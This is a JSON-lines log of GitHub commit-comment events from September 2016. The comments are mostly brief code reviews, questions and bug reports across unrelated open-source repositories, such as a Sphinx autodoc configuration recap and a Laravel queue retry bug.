{"id":"4544977181","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975518,"position":11,"line":11,"path":"src/findinterval.jl","commit_id":"02ce13367149bd47fa13fee1670ff2fd08057984","created_at":"2016-09-11T00:33:25Z","updated_at":"2016-09-11T00:33:25Z","body":"But I can't understand why the function still works for strings even though I defined the function in REPL."}},"created_at":"2016-09-11T00:33:25Z"}
{"id":"4544977297","type":"CommitCommentEvent","actor":{"login":"bplower"},"repo":{"name":"bplower/cssef"},"payload":{"comment":{"id":18975519,"position":null,"line":null,"path":null,"commit_id":"481b85e910d2c381689eebd92b944a140428028d","created_at":"2016-09-11T00:33:31Z","updated_at":"2016-09-11T00:33:31Z","body":"The short answer is: kind of.\r\nThis change alone wasn't enough, but it put me on the right path to finding a working solution. The following is a (hopefully helpful) recap of what I ended up doing:\r\n\r\nI found that several projects have defined an \"ext\" module that they import in the sphinx conf.py file. For example, after implementing the \"ext\" module, my folder structure looks like:\r\n```\r\nuser@debian:~/development/cssef/docs$ tree\r\n.\r\n├── ext\r\n│   ├── apidoc.py\r\n│   └── __init__.py\r\n├── requirements.rtd.txt\r\n└── source\r\n    ├── conf.py\r\n```\r\nand the extensions list looks like (the two important imports being `sphinx.ext.autodoc` and `ext.apidoc`):\r\n```python\r\n# in .../docs/source/conf.py\r\n\r\nextensions = [\r\n    'sphinx.ext.autodoc',\r\n    'sphinx.ext.napoleon',\r\n    'ext.apidoc'\r\n]\r\n```\r\n\r\nFor this to work, you have to add the modules to the module path, which is actually explained in comments just above the \"General Configuration\" section of an auto-generated sphinx conf.py file. In my case I've added paths to the two modules I'm testing, as well as the path to the \"ext\" module that actually executes autodoc:\r\n```python\r\n# in .../docs/source/conf.py\r\n\r\n# If extensions (or modules to document with autodoc) are in another directory,\r\n# add these directories to sys.path here. If the directory is relative to the\r\n# documentation root, use os.path.abspath to make it absolute, like shown here.\r\n#sys.path.insert(0, os.path.abspath('.'))\r\nsys.path.insert(0, os.path.abspath('../../CssefServer'))\r\nsys.path.insert(0, os.path.abspath('../../CssefClient'))\r\n# Inspired by an openstack config I found\r\n# https://github.com/openstack/deb-python-pycadf/blob/master/doc/source/conf.py\r\nsys.path.insert(0, os.path.abspath('..'))\r\n```\r\nThe contents of `.../docs/ext/apidoc.py` work very similarly to the changes I made in this commit. There's a great example in the [openstack deb-python-pycadf repo](https://github.com/openstack/deb-python-pycadf/blob/master/doc/ext/apidoc.py), which [I've tweaked](https://github.com/bplower/cssef/blob/refactor/docs/ext/apidoc.py) to fit my particular situation. My version just takes into account the two packages I'm testing, and excludes 'setup.py' and 'tests' which were causing a bunch of apidoc errors.\r\n\r\nI hope this was helpful for you, and possibly others in the future. If you have any questions, let me know. :)"}},"created_at":"2016-09-11T00:33:31Z"}
{"id":"4544977651","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975520,"position":158,"line":92,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:33:49Z","updated_at":"2016-09-11T00:33:49Z","body":"years would be nicer:  `print('Solved in {:.2f} years'.format(days / 365.25))`"}},"created_at":"2016-09-11T00:33:49Z"}
{"id":"4544981688","type":"CommitCommentEvent","actor":{"login":"jerryshaw12"},"repo":{"name":"nofearnohappy/kernel_6.0_hermes"},"payload":{"comment":{"id":18975528,"position":null,"line":null,"path":null,"commit_id":"a41fa958d27ccfd05e34d2a0183c86c511f44ad9","created_at":"2016-09-11T00:36:41Z","updated_at":"2016-09-11T00:36:41Z","body":"if I have Bosch BMI 160 Gyro and Accel, will it work in your latest beta? 10.9?"}},"created_at":"2016-09-11T00:36:41Z"}
{"id":"4544983643","type":"CommitCommentEvent","actor":{"login":"toilethinges"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975530,"position":5,"line":771,"path":"data/wanderers.txt","commit_id":"0de5d40f6be0298ab5a6828d5e7b507b60543e93","created_at":"2016-09-11T00:38:39Z","updated_at":"2016-09-11T00:38:39Z","body":"Build, not built*"}},"created_at":"2016-09-11T00:38:39Z"}
{"id":"4544984395","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18975533,"position":null,"line":null,"path":null,"commit_id":"f8355e9ee516bb338ff14f7ee6c438da6f61ad53","created_at":"2016-09-11T00:39:35Z","updated_at":"2016-09-11T00:39:35Z","body":"This adds an option to disable the db clean loop. "}},"created_at":"2016-09-11T00:39:35Z"}
{"id":"4544988083","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18975538,"position":null,"line":null,"path":null,"commit_id":"849f8e9af375a7548f50695ef634ff49c5219293","created_at":"2016-09-11T00:42:19Z","updated_at":"2016-09-11T00:42:19Z","body":"Thanks for the idea, I have tried this localy\r\n\r\n````\r\nBitboard p = pos.pieces(PAWN);\r\nbool bothFlanks = (p & QueenSide) && (p & KingSide) && (p & ~CenterFiles);\r\n````\r\n\r\nAfter a couple of games against master, watched at the games and didn't find anything special in the style of play... So I don't know!"}},"created_at":"2016-09-11T00:42:19Z"}
{"id":"4544988243","type":"CommitCommentEvent","actor":{"login":"bokatan"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18975540,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-11T00:42:29Z","updated_at":"2016-09-11T00:42:29Z","body":"Tumblr said to respect the IP of the creators. My account was reported for sharing an image from another platform that is FAN ART and I was told that my account would get deleted because I shared it. \r\n\r\nFAN ART is when you take your fave subject matter and create art. For example, you like Star Wars and you create fan art of your fave main characters. While you took your hard time to create the art, you do NOT OWN INTELLECTUAL PROPERTY on your fave characters and you are OWED NOTHING for the image other than LABOR to create the image. DEMANDING ATTRIBUTION is irrelevant because you do not own the intellectual property copyright of the FAN ART... That's how it is right now."}},"created_at":"2016-09-11T00:42:29Z"}
{"id":"4544988542","type":"CommitCommentEvent","actor":{"login":"abitmore"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":18975541,"position":null,"line":null,"path":null,"commit_id":"f31b57ac2809f75dba515e4cfbd59f8747228a40","created_at":"2016-09-11T00:42:48Z","updated_at":"2016-09-11T00:42:48Z","body":"What if `from == to` in `escrow_release_operation`?"}},"created_at":"2016-09-11T00:42:48Z"}
{"id":"4544988634","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975542,"position":11,"line":11,"path":"src/findinterval.jl","commit_id":"02ce13367149bd47fa13fee1670ff2fd08057984","created_at":"2016-09-11T00:42:54Z","updated_at":"2016-09-11T00:42:54Z","body":"OK, I see where is the problem. I defined several versions of `findinterval` in REPL...\r\nThanks!"}},"created_at":"2016-09-11T00:42:54Z"}
{"id":"4544989101","type":"CommitCommentEvent","actor":{"login":"justmartin"},"repo":{"name":"justmartin/concussion-protocol"},"payload":{"comment":{"id":18975543,"position":null,"line":null,"path":null,"commit_id":"45a91439f5c794477a3e8c9b094c5add060df719","created_at":"2016-09-11T00:43:21Z","updated_at":"2016-09-11T00:43:21Z","body":"forgot to add commit message:\r\ncloses #4"}},"created_at":"2016-09-11T00:43:21Z"}
{"id":"4544989668","type":"CommitCommentEvent","actor":{"login":"TheImmortal"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18975545,"position":17,"line":127,"path":"monitor.js","commit_id":"c030c842458e31e8ca1ec7efeb69e65ecfb250fe","created_at":"2016-09-11T00:43:54Z","updated_at":"2016-09-11T00:43:54Z","body":"This implies 6; the message below says 5."}},"created_at":"2016-09-11T00:43:54Z"}
{"id":"4544990600","type":"CommitCommentEvent","actor":{"login":"tnraptor14"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975546,"position":15,"line":7,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:44:56Z","updated_at":"2016-09-11T00:44:56Z","body":"wait and visit will be used (hopefully) in the next solution.  I would like to init the superclass with every possible variable to manipulate but i'm struggling with understanding how to do that"}},"created_at":"2016-09-11T00:44:56Z"}
{"id":"4544990845","type":"CommitCommentEvent","actor":{"login":"joschiwald"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18975547,"position":85,"line":5912,"path":"src/server/game/Spells/Auras/SpellAuraEffects.cpp","commit_id":"40dad022f9e6403bd3ca94b92477ef54111d015c","created_at":"2016-09-11T00:45:11Z","updated_at":"2016-09-11T00:45:11Z","body":"why are you using 2 damageinfos, a proc is only 1 event"}},"created_at":"2016-09-11T00:45:11Z"}
{"id":"4544991755","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18975548,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T00:46:10Z","updated_at":"2016-09-11T00:46:10Z","body":"WHAT DO YOU MEAN BY FLIRTED?\r\n@JoinRajuncraftNow"}},"created_at":"2016-09-11T00:46:10Z"}
{"id":"4544991861","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18975549,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T00:46:16Z","updated_at":"2016-09-11T00:46:16Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-11T00:46:16Z"}
{"id":"4544991905","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18975550,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T00:46:18Z","updated_at":"2016-09-11T00:46:18Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-11T00:46:18Z"}
{"id":"4544991932","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18975551,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T00:46:20Z","updated_at":"2016-09-11T00:46:20Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-11T00:46:20Z"}
{"id":"4544992082","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18975552,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T00:46:28Z","updated_at":"2016-09-11T00:46:28Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-11T00:46:28Z"}
{"id":"4544992375","type":"CommitCommentEvent","actor":{"login":"tnraptor14"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975553,"position":28,"line":16,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:46:46Z","updated_at":"2016-09-11T00:46:46Z","body":"I don't understand what you mean here"}},"created_at":"2016-09-11T00:46:46Z"}
{"id":"4544996174","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":18975557,"position":null,"line":null,"path":null,"commit_id":"3002e25ac24f7e5d3919871618c4002a60d58cf0","created_at":"2016-09-11T00:50:36Z","updated_at":"2016-09-11T00:50:36Z","body":"[#1786]"}},"created_at":"2016-09-11T00:50:36Z"}
{"id":"4544996870","type":"CommitCommentEvent","actor":{"login":"xfq"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":18975558,"position":null,"line":null,"path":null,"commit_id":"cbe37e727e9f6cd927c074cda465bb2b25465e28","created_at":"2016-09-11T00:51:20Z","updated_at":"2016-09-11T00:51:20Z","body":"@xconverge Maybe there's a better solution? Something like \"see the `configuration` section in `package.json`\"? So this line in README won't be updated time after time."}},"created_at":"2016-09-11T00:51:20Z"}
{"id":"4544997738","type":"CommitCommentEvent","actor":{"login":"TeamFatCat"},"repo":{"name":"TeamFatCat/TransferForPC"},"payload":{"comment":{"id":18975559,"position":null,"line":null,"path":null,"commit_id":"692db45c2646aaf4067e6de16e5d0b79b5d8d198","created_at":"2016-09-11T00:52:05Z","updated_at":"2016-09-11T00:52:05Z","body":"eclipse java项目"}},"created_at":"2016-09-11T00:52:05Z"}
{"id":"4544999089","type":"CommitCommentEvent","actor":{"login":"phil-lopreiato"},"repo":{"name":"GW-SHC/gw-http"},"payload":{"comment":{"id":18975561,"position":null,"line":null,"path":null,"commit_id":"3bdd80d49f953de4b86591fa3a87d087c875b6a4","created_at":"2016-09-11T00:53:22Z","updated_at":"2016-09-11T00:53:22Z","body":":heart: "}},"created_at":"2016-09-11T00:53:22Z"}
{"id":"4544999337","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975562,"position":101,"line":58,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:53:37Z","updated_at":"2016-09-11T00:53:37Z","body":"I'd pass in a bulb object.  That way you could manipulate it and wouldn't have to return it.  Then you could return whether or not you want to declare victory."}},"created_at":"2016-09-11T00:53:37Z"}
{"id":"4545000865","type":"CommitCommentEvent","actor":{"login":"whoburg"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18975565,"position":null,"line":null,"path":null,"commit_id":"c57d13f8e34aecdd667a25688399e2dc72708002","created_at":"2016-09-11T00:55:11Z","updated_at":"2016-09-11T00:55:11Z","body":"#88 "}},"created_at":"2016-09-11T00:55:11Z"}
{"id":"4545001451","type":"CommitCommentEvent","actor":{"login":"student50"},"repo":{"name":"student50/tmp"},"payload":{"comment":{"id":18975567,"position":null,"line":null,"path":null,"commit_id":"1ffde9c7694e21dc73cf7fa7fb798b8db15f8c31","created_at":"2016-09-11T00:55:48Z","updated_at":"2016-09-11T00:55:48Z","body":"test"}},"created_at":"2016-09-11T00:55:48Z"}
{"id":"4545001517","type":"CommitCommentEvent","actor":{"login":"student50"},"repo":{"name":"student50/tmp"},"payload":{"comment":{"id":18975568,"position":1,"line":1,"path":"foo.c","commit_id":"1ffde9c7694e21dc73cf7fa7fb798b8db15f8c31","created_at":"2016-09-11T00:55:52Z","updated_at":"2016-09-11T00:55:52Z","body":"test"}},"created_at":"2016-09-11T00:55:52Z"}
{"id":"4545004257","type":"CommitCommentEvent","actor":{"login":"Clownacy"},"repo":{"name":"sonicretro/skdisasm"},"payload":{"comment":{"id":18975570,"position":null,"line":null,"path":null,"commit_id":"8879d54e35797e11a1e23d0e8c0a6c780334d592","created_at":"2016-09-11T00:58:52Z","updated_at":"2016-09-11T00:58:52Z","body":"I wouldn't say we don't need s3.bin and sk.bin: they're still used by AppendS3.bat and splitS3K.bat."}},"created_at":"2016-09-11T00:58:52Z"}
{"id":"4545004955","type":"CommitCommentEvent","actor":{"login":"vacqq"},"repo":{"name":"vacqq/3d"},"payload":{"comment":{"id":18975571,"position":null,"line":null,"path":null,"commit_id":"f408980ecca4a04a9701cff805e8401d67fe654b","created_at":"2016-09-11T00:59:41Z","updated_at":"2016-09-11T00:59:41Z","body":"321"}},"created_at":"2016-09-11T00:59:41Z"}
{"id":"4545006114","type":"CommitCommentEvent","actor":{"login":"otakai"},"repo":{"name":"otakai/projeto-usp.github.io"},"payload":{"comment":{"id":18975573,"position":null,"line":null,"path":null,"commit_id":"428b13311414a0b6f1da1d057e89ed526d2a825c","created_at":"2016-09-11T01:00:42Z","updated_at":"2016-09-11T01:00:42Z","body":"Unificar"}},"created_at":"2016-09-11T01:00:42Z"}
{"id":"4545008036","type":"CommitCommentEvent","actor":{"login":"GerbilSoft"},"repo":{"name":"sonicretro/skdisasm"},"payload":{"comment":{"id":18975574,"position":null,"line":null,"path":null,"commit_id":"8879d54e35797e11a1e23d0e8c0a6c780334d592","created_at":"2016-09-11T01:02:29Z","updated_at":"2016-09-11T01:02:29Z","body":"Yeah, this was pointed out to me after I pushed the commit. Still, they're not needed for verification, so one less dependency is always a good thing."}},"created_at":"2016-09-11T01:02:29Z"}
{"id":"4545009638","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18975575,"position":null,"line":null,"path":null,"commit_id":"83580fcfb48b3949b87ddc1c50a469955d5f23b4","created_at":"2016-09-11T01:03:58Z","updated_at":"2016-09-11T01:03:58Z","body":"@rickyc im not sure how to use objects to save a signed up email/password and then log it in without everything being successful during the log in."}},"created_at":"2016-09-11T01:03:58Z"}
{"id":"4545010425","type":"CommitCommentEvent","actor":{"login":"tnraptor14"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975577,"position":145,"line":87,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T01:04:43Z","updated_at":"2016-09-11T01:04:43Z","body":"that doesn't manipulate the lightbulb though"}},"created_at":"2016-09-11T01:04:43Z"}
{"id":"4545011323","type":"CommitCommentEvent","actor":{"login":"aapav01"},"repo":{"name":"Exynos7580/android_device_samsung_j7eltexx"},"payload":{"comment":{"id":18975578,"position":null,"line":null,"path":null,"commit_id":"782723793a6ab81ae11c814fcf4907cde78204eb","created_at":"2016-09-11T01:05:39Z","updated_at":"2016-09-11T01:05:39Z","body":"is this working ?\r\n"}},"created_at":"2016-09-11T01:05:39Z"}
{"id":"4545011519","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975580,"position":145,"line":87,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T01:05:53Z","updated_at":"2016-09-11T01:05:53Z","body":"Yea, I see that now (see my suggestion for a lightbulb object up above)"}},"created_at":"2016-09-11T01:05:53Z"}
{"id":"4545012414","type":"CommitCommentEvent","actor":{"login":"LFeh"},"repo":{"name":"frontendbr/eventos"},"payload":{"comment":{"id":18975582,"position":null,"line":null,"path":null,"commit_id":"52202bdf1c8a23955df9627fb480095c59af1567","created_at":"2016-09-11T01:06:48Z","updated_at":"2016-09-11T01:06:48Z","body":";)"}},"created_at":"2016-09-11T01:06:48Z"}
{"id":"4545013081","type":"CommitCommentEvent","actor":{"login":"aapav01"},"repo":{"name":"Exynos7580/android_device_samsung_j7eltexx"},"payload":{"comment":{"id":18975583,"position":6,"line":26,"path":"device.mk","commit_id":"a6e3c91606e4884cd7307f53038db061d313e698","created_at":"2016-09-11T01:07:29Z","updated_at":"2016-09-11T01:07:29Z","body":"Y this ?\r\n\r\n320dpi gives better artwork and fix some resources :confused: \r\n"}},"created_at":"2016-09-11T01:07:29Z"}
{"id":"4545013883","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975585,"position":15,"line":7,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T01:08:17Z","updated_at":"2016-09-11T01:08:17Z","body":"The superclass should just accept an id...you can call it from the subclass like this: `super(Ringleader, self).__init__(id)`"}},"created_at":"2016-09-11T01:08:17Z"}
{"id":"4545014160","type":"CommitCommentEvent","actor":{"login":"jrob8577"},"repo":{"name":"Auctionator/Auctionator"},"payload":{"comment":{"id":18975586,"position":null,"line":null,"path":null,"commit_id":"91a004cc4c94c5900e522f5c4b1f1da266169754","created_at":"2016-09-11T01:08:38Z","updated_at":"2016-09-11T01:08:38Z","body":"@Stanzilla So that people don't file issues for outdated clients.  The only time you will see the version check is if you group, or log in with guildies, and only if you have an outdated client."}},"created_at":"2016-09-11T01:08:38Z"}
{"id":"4545014544","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975587,"position":15,"line":7,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T01:09:08Z","updated_at":"2016-09-11T01:09:08Z","body":"regarding wait, visit, and duty, I'm thinking there should just be a `visit`, visit doing basically what your duty does.  I don't see a need for any more than that."}},"created_at":"2016-09-11T01:09:08Z"}
{"id":"4545015266","type":"CommitCommentEvent","actor":{"login":"messi2050"},"repo":{"name":"Exynos7580/android_device_samsung_j7eltexx"},"payload":{"comment":{"id":18975588,"position":6,"line":26,"path":"device.mk","commit_id":"a6e3c91606e4884cd7307f53038db061d313e698","created_at":"2016-09-11T01:09:53Z","updated_at":"2016-09-11T01:09:53Z","body":"it was causing a build error"}},"created_at":"2016-09-11T01:09:53Z"}
{"id":"4545015828","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18975590,"position":null,"line":null,"path":null,"commit_id":"83580fcfb48b3949b87ddc1c50a469955d5f23b4","created_at":"2016-09-11T01:10:28Z","updated_at":"2016-09-11T01:10:28Z","body":"That's an excellent question! I forgot to show you guys how to assign\nvariables to objects.\n\n```js\nvar user = { email: \"test@test.com\" };\nuser.email = \"somethingnew@email.com\";\n```\n\n\nOn Sat, Sep 10, 2016 at 9:03 PM erinl1 <notifications@github.com> wrote:\n\n> @rickyc <https://github.com/rickyc> im not sure how to use objects to\n> save a signed up email/password and then log it in without everything being\n> successful during the log in.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/83580fcfb48b3949b87ddc1c50a469955d5f23b4#commitcomment-18975575>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAG0kb-2-ZmuSFbK57SynJMnerYxLf54ks5qo1N-gaJpZM4J534H>\n> .\n>\n"}},"created_at":"2016-09-11T01:10:28Z"}
{"id":"4545016711","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975591,"position":28,"line":16,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T01:11:25Z","updated_at":"2016-09-11T01:11:25Z","body":"Just pass the ID to the __init__ method from outside the class.  See below in the loop where you create all the prisoners"}},"created_at":"2016-09-11T01:11:25Z"}
{"id":"4545016866","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18975592,"position":null,"line":null,"path":null,"commit_id":"711a025f83191a61f0100a8060b68478be177826","created_at":"2016-09-11T01:11:34Z","updated_at":"2016-09-11T01:11:34Z","body":"++"}},"created_at":"2016-09-11T01:11:34Z"}
{"id":"4545018745","type":"CommitCommentEvent","actor":{"login":"mdsitton"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18975595,"position":102,"line":94,"path":"src/core/audio/output/soundio.hpp","commit_id":"cf0cc3a7aef8e696fc0c5d8d6024e467e90a39f9","created_at":"2016-09-11T01:13:32Z","updated_at":"2016-09-11T01:13:32Z","body":"This should be named m_logger now."}},"created_at":"2016-09-11T01:13:32Z"}
{"id":"4545019269","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":18975596,"position":null,"line":null,"path":null,"commit_id":"c66a54bf39727f3a2be0aba17a77ec0a12dd26c3","created_at":"2016-09-11T01:14:06Z","updated_at":"2016-09-11T01:14:06Z","body":"Here's the screenshot as mentioned in the commit caption:\r\n![screenshot](https://cloud.githubusercontent.com/assets/1862162/18414548/2e310938-7782-11e6-9b91-e1c9f59683d6.png)\r\n"}},"created_at":"2016-09-11T01:14:06Z"}
{"id":"4545020729","type":"CommitCommentEvent","actor":{"login":"aapav01"},"repo":{"name":"Exynos7580/android_device_samsung_exynos7580-common"},"payload":{"comment":{"id":18975597,"position":29,"line":81,"path":"BoardConfigCommon.mk","commit_id":"9864c183af293c0a27d9c57b651cc971aeeefd1d","created_at":"2016-09-11T01:15:30Z","updated_at":"2016-09-11T01:15:30Z","body":"Why did u disable this.. that is y u get that gralloc.cpp error\r\n"}},"created_at":"2016-09-11T01:15:30Z"}
{"id":"4545022021","type":"CommitCommentEvent","actor":{"login":"mdsitton"},"repo":{"name":"OpenRhythm/OpenRhythm"},"payload":{"comment":{"id":18975598,"position":21,"line":17,"path":"src/core/audio/output/soundio.hpp","commit_id":"cf0cc3a7aef8e696fc0c5d8d6024e467e90a39f9","created_at":"2016-09-11T01:16:46Z","updated_at":"2016-09-11T01:16:46Z","body":"Are you certain that a singleton is the best idea? I like to avoid using singletons at all costs if i can..."}},"created_at":"2016-09-11T01:16:46Z"}
{"id":"4545023726","type":"CommitCommentEvent","actor":{"login":"DiegoNolan"},"repo":{"name":"DiegoNolan/reflex-dom"},"payload":{"comment":{"id":18975599,"position":71,"line":79,"path":"src/Reflex/Dom/Widget/Basic.hs","commit_id":"662122bcec9eed57b872001f8147fbb2c280325e","created_at":"2016-09-11T01:18:27Z","updated_at":"2016-09-11T01:18:27Z","body":"I forgot to Export HasAttributes and now I can't figure out how to update this diff. Give me second."}},"created_at":"2016-09-11T01:18:27Z"}
{"id":"4545024456","type":"CommitCommentEvent","actor":{"login":"Jonathan50"},"repo":{"name":"Jonathan50/do-it"},"payload":{"comment":{"id":18975600,"position":null,"line":null,"path":null,"commit_id":"78a18310f34956fb56b2e24380029294d9786d90","created_at":"2016-09-11T01:19:09Z","updated_at":"2016-09-11T01:19:09Z","body":"it works"}},"created_at":"2016-09-11T01:19:09Z"}
{"id":"4545024523","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":18975601,"position":null,"line":null,"path":null,"commit_id":"578cd3b909cab5635e0cc148f25e7b3da4836ddf","created_at":"2016-09-11T01:19:12Z","updated_at":"2016-09-11T01:19:12Z","body":"Ive done it a different way using custom EnumBlockRenderTypes, and it is pretty much ready to push"}},"created_at":"2016-09-11T01:19:12Z"}
{"id":"4545025290","type":"CommitCommentEvent","actor":{"login":"Landish"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18975602,"position":24,"line":267,"path":"src/Illuminate/Queue/Worker.php","commit_id":"de2e30a80943702166f0e2cce9cf088a64a9e435","created_at":"2016-09-11T01:19:59Z","updated_at":"2016-09-11T01:19:59Z","body":"Not sure, if i'm doing something wrong, or this code has a problem, but, after upgrading to 5.3.8 version, when I call `php artisan queue:listen` it always throws `markJobAsFailedIfAlreadyExceedsMaxAttempts` exception, because  `$maxTries` is 0 and `$job->attempts()` is 1. So condition `$job->attempts() <= $maxTries` will be always false. To fix this issue I had to run ` php artisan queue:listen --tries=1`. \r\n\r\nUntil this release I had no issue with working with queues, but now I do. I guess, there are 2 options to fix this: \r\n\r\n* Set `WorkerOptions` `maxTries` property to `1`.\r\n* Update `markJobAsFailedIfAlreadyExceedsMaxAttempts`, so it could work with current default params (in this case `--tries=0`)."}},"created_at":"2016-09-11T01:19:59Z"}
{"id":"4545025739","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18975603,"position":null,"line":null,"path":null,"commit_id":"f6f9ac5cc81c178fc033dbadfc9d5422d0a3eb66","created_at":"2016-09-11T01:20:23Z","updated_at":"2016-09-11T01:20:23Z","body":"++"}},"created_at":"2016-09-11T01:20:23Z"}
{"id":"4545025959","type":"CommitCommentEvent","actor":{"login":"MrTJP"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":18975604,"position":null,"line":null,"path":null,"commit_id":"578cd3b909cab5635e0cc148f25e7b3da4836ddf","created_at":"2016-09-11T01:20:37Z","updated_at":"2016-09-11T01:20:37Z","body":"I figured you found a better way to to it. Thats why I didn't merge this branch yet :D"}},"created_at":"2016-09-11T01:20:37Z"}
{"id":"4545026252","type":"CommitCommentEvent","actor":{"login":"tairorojo"},"repo":{"name":"tairorojo/zabbix-templates"},"payload":{"comment":{"id":18975605,"position":null,"line":null,"path":null,"commit_id":"4b85c1fdb8d66f7216f82a36211be26e2393a01f","created_at":"2016-09-11T01:20:53Z","updated_at":"2016-09-11T01:20:53Z","body":"change template to zabbix 3.0"}},"created_at":"2016-09-11T01:20:53Z"}
{"id":"4545026257","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18975606,"position":null,"line":null,"path":null,"commit_id":"f6f9ac5cc81c178fc033dbadfc9d5422d0a3eb66","created_at":"2016-09-11T01:20:53Z","updated_at":"2016-09-11T01:20:53Z","body":"should have an issue so it can be tracked in the milestone and will be QA'ed that way. Thanks."}},"created_at":"2016-09-11T01:20:53Z"}
{"id":"4545026263","type":"CommitCommentEvent","actor":{"login":"rfw"},"repo":{"name":"Shizmob/pydle"},"payload":{"comment":{"id":18975607,"position":null,"line":null,"path":null,"commit_id":"311c723ef00595732791ebd07474bec0ee842dfc","created_at":"2016-09-11T01:20:54Z","updated_at":"2016-09-11T01:20:54Z","body":"I believe the exceptions were handled incorrectly by the original change. Are they not working correctly for you?"}},"created_at":"2016-09-11T01:20:54Z"}
